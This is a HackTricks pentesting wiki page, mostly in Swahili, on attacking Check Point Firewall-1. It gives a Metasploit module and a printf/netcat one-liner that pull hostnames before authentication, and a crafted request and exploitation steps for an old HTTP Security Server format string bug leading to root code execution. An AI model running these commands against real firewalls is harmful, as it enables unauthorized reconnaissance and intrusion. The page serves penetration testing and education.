# 264/tcp - Pentesting Check Point Firewall

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Inawezekana kuingiliana na CheckPoint Firewall-1 firewalls ili kugundua taarifa muhimu kama jina la firewall na jina la management station. Hii inaweza kufanywa kwa kutuma query kwenye port 264/TCP.

Kupata Majina ya Firewall na Management Station

Kwa kutumia ombi la kabla ya uthibitishaji (pre-authentication request), unaweza kuendesha module inayolenga CheckPoint Firewall-1. Amri zinazohitajika kwa operesheni hii zimetajwa hapa chini:

use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10

Wakati wa utekelezaji, moduli inajaribu kuwasiliana na huduma ya SecuRemote Topology ya firewall. Ikiwa itafanikiwa, inathibitisha kuwepo kwa CheckPoint Firewall na inapata majina ya firewall pamoja na mwenyeji wa usimamizi wa SmartCenter. Hapa kuna mfano wa jinsi pato linaweza kuonekana:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

Njia Mbadala ya Kugundua Hostname na ICA Name

Mbinu nyingine inahusisha command moja kwa moja inayotuma query maalum kwa firewall na kuchambua majibu ili kunasa hostname na ICA name ya firewall. command na muundo wake ni kama ifuatavyo:

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Matokeo ya amri hii yanatoa taarifa za kina kuhusu jina la cheti la firewall (CN) na shirika (O), kama ilivyoonyeshwa hapa chini:

CN=Panama,O=MGMTT.srv.rxfrmi

HTTP Security Server Format String Bug (CAN-2004-0039)

Builds zilizoathirika: NG FCS, NG FP1, NG FP2, NG FP3 HF2, and NG with Application Intelligence R54/R55.
Mahitaji: HTTP Security Server au AI HTTP proxy lazima iwe imewezeshwa na ichunguze kwa uwazi bandari inayolengwa; ikiwa uchunguzi wa HTTP umezimwa njia ya msimbo hatarishi haitafikiwa kamwe.

Kusababisha mshughulizi wa makosa

Proxy inakataa ujumbe wa HTTP uliofomati vibaya na kujenga ukurasa wake wa kosa kwa sprintf(errbuf, attacker_string);, ikiruhusu bytes zinazodhibitiwa na mshambuliaji kutumika kama format string. Tuma ombi batili kupitia firewall na angalia kosa lililotengenezwa na proxy linaloonyesha payload yako:

printf 'BOGUS%%08x%%08x%%08x%%n HTTP/1.0\r\nHost: internal.local\r\n\r\n' | nc -nv [FIREWALL_IP] 80

Ikiwa HTTP inspection imewekwa, the firewall (si backend server) inajibu mara moja, ikithibitisha kwamba the middlebox parsed and replayed the request line.

Exploitation

Format string primitive

• Force the parser into the error routine (invalid method, URI, or headers).
• Weka attacker-controlled dwords mbele ili %x, %s, na %n directives zihesabu kama stack arguments.
• Tumia %x/%s ku leak pointers, kisha %n/%hn kuandika formatted byte count kwenye addresses zilizochaguliwa, ukiandika juu ya return pointers, vtables, au heap metadata kabla ya hijacking execution kwa injected shellcode au ROP.

Heap overflow primitive

The same unsafe sprintf() writes into a fixed-size heap buffer. Changanya request body ndefu na oversized directives (mf. %99999x) ili formatted output izidi allocation na kuharibu adjacent heap structures, ikikuwezesha ku-forge freelist pointers au function tables ambazo baadaye zinafanikiwa ku-dereference.

Impact

Compromise of the proxy grants code execution inside the firewall process (SYSTEM on Windows appliances, root on UNIX), kuruhusu rule manipulation, traffic interception, na pivoting zaidi ndani ya management network.

References

• https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360
• https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264
• https://www.cisa.gov/news-events/alerts/2004/02/05/http-parsing-vulnerabilities-check-point-firewall-1
• http://xforce.iss.net/xforce/alerts/id/162

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.